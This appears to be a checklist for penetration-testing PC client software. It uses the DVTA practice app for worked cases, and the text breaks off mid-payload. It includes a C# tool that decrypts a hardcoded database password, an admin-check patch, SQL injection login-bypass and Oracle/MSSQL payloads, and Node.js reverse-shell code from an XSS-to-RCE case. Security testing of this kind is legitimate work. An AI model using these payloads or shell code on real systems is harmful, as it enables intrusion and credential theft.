0x00 Introduction
In recent years, the interaction between users and PC clients has become increasingly important. This trend is driven by the need for enhanced user
This project primarily targets penetration testing for PC clients (CS architecture). It combines personal testing experience with online resources to form a checklist. If you have any questions, please get in touch. We look forward to more contributions in techniques and case studies from everyone.
0x01 Overview
PC client, with a rich-featured graphical user interface, CS architecture.
0x02 Development Languages
C# (.NET), JAVA, DELPHI, C, C++ ……
0x03 Protocols
TCP, HTTP(S), TDS ……
0x04 Databases
Oracle, MSSQL, DB2 ……
0x05 Testing Tools
// Related tool downloads: https://github.com/theLSA/hack-cs-tools
dvta: a PC client practice range
ida pro: static analysis tool
ollydbg: dynamic analysis tool
CFF Explorer: PE file analysis
PEID: shell checking tool
exeinfope/studype: PE file analysis
wireshark: observe traffic
tcpview: observe TCP traffic
echo Mirage: intercept TCP traffic
burpsuite: HTTP(S) packet capture
proxifier: global proxy traffic
procmon: files and registry monitoring
regshot: registry change comparison
process Hacker: process analysis
RegfromApp: registry monitoring
WSExplorer: capture processes from the inter-year alliance
strings: view program strings
.NET [de]compilation:
dotpeek
de4dot
dnspy
ilspy
sae
ildasm
ilasm
Java decompilation
jad
jd-gui
jadx
dex2jar
Online versions:javare.cn
www.javadecompilers.com
Reflexil: assembly editor (can be used as an ilspy plugin)
Vcg: automated code audit tool
BinScope: binary analysis tool
0x06 Proxy Settings
Most clients lack proxy configuration functions, requiring manual global proxy setup. Here are two methods:
1) IE – Internet Settings – Connections – LAN Settings.
2) Proxy server/proxy server rules
// HTTP traffic can be conveniently tested with BurpSuite (set proxy server to Burp proxy address).
0x07 Testing Points
0.1 Information Gathering
Compilation information, development environment/language, protocols used, database, IP, obfuscation/encryption, packing, etc.
Case 0 – CFF viewing client information (e.g., compilation environment)
dvta
1. Reverse Engineering
Decompilation, source code leakage, hardcoded keys/passwords, encryption/decryption logic, role determination logic (0-admin, 1-normal user), backdoors, etc.
Case 0 – Decompile to obtain encryption and decryption logic and develop decryption tool
dvta
Through this logic and obtained information
Encrypted text: CTsvjZ0jQghXYWbSRcPxpQ ==
AES Key: J8gLXc454o5tW2HEF7HahcXPufj9v8k8
IV: fq20T0gMnXa6g0l4
Develop a decryption tool
“`javascriptusing System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows.Forms;using System.Security.Cryptography;namespace aesdecrypt{ public partial class aesdecrypt : Form { public aesdecrypt() { InitializeComponent(); } private void decrypt(object sender, EventArgs e) { String key = “J8gLXc454o5tW2HEF7HahcXPufj9v8k8”; String IV = “fq20T0gMnXa6g0l4”; String encryptedtext = “CTsvjZ0jQghXYWbSRcPxpQ==”; byte[] encryptedBytes = Convert.FromBase64String(encryptedtext); AesCryptoServiceProvider aes = new AesCryptoServiceProvider(); aes.BlockSize = 128; aes.KeySize = 256; aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key); aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV); aes.Padding = PaddingMode.PKCS7; aes.Mode = CipherMode.CBC; ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV); byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length); String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes); Console.WriteLine(“\n”); Console.WriteLine(“##########Decrypting Database password##########\n”); Console.WriteLine(“Decrypted Database password:” + decryptedString + “\n”); Console.WriteLine(“##########Done##########\n”); } }}“`
Case 1 – Decompile to modify code logic, allowing normal users to log in as administrators
dvta
1-Isadmin
0 Normaluser
Change 1 to 0 to determine as admin
2. Information Disclosure
Plain text sensitive information, sensitive files (e.g., xxx.config in installation directory).
Registry: Use regshot to compare client running (e.g., logging in) registry differences before and after.
Development debugging logging (e.g., dvta.exe >> log.txt)
process hacker View plaintext sensitive data in client memory (e.g., account passwords/keys).
strings directly view client strings (e.g., IP information).
View source code (e.g., on GitHub, Gitee, etc.)
Case 0 – Configuration sensitive information disclosure
dvta
Case 1 – Memory leakage of database account password
dvta
Case 2 – Source code containing hardcoded FTP account password
dvta
Case 3 – Development debugging log disclosure
dvta
Case 4 – Some systems save account passwords locally after login
//Example source from https://blog.csdn.net/weixin_30685047/article/details/95916065
3. Transmission Traffic
Wireshark / echo Mirage / burpsuite + nopeproxy / filler / charles
FTP and other protocols transmit account passwords in plaintext
SQL statements transmitted in plaintext (e.g., using crafted injection, privilege escalation, etc.)
Case 0 – SQL statements of a certain educational administration system are transmitted in plaintext, returning plaintext data
//Example source from wooyun
4. Other Vulnerabilities
Brute Force
Such as login functionality.
Username Enumeration
Case 0
SQL Statement Exposure
Case 0
SQL Injection
Such as login locations, universal password
xxx’ or ‘x’=’x
xxx’ or 1=1–
In input fields, construct closure error such as ‘,’) , %’), order by 100–, etc.
Use the displayed bits or error extraction of data, principle is the same as web injection, similar across different databases.
Case 0 – oracle injection
“`javascript’union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual–“`
Case 1 – MSSQL injection
“`javascript111′) and (select user)>0–“`
CSV Injection
For instance, when exporting Excel, input 1+1 and check for 2 after exporting.
Weak Password
Try combinations like admin 123456 etc.
XSS
For example, Electron, NodeWebKit, etc.
Case 0 – Chinese Ant Sword XSS to RCE
Environment: Win7 + PHPStudy (PHP5.6.27-nts) + Perl + NC + AntSword2.0.5
XSS Webshell:
“`javascript“`
WIN + Node.js:
Success
“`javascriptvar net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”);var client = new net.Socket();client.connect(6677, “127.0.0.1”, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client);sh.stderr.pipe(client); });?><?phpheader(“HTTP/1.1 500 Not Relevant reference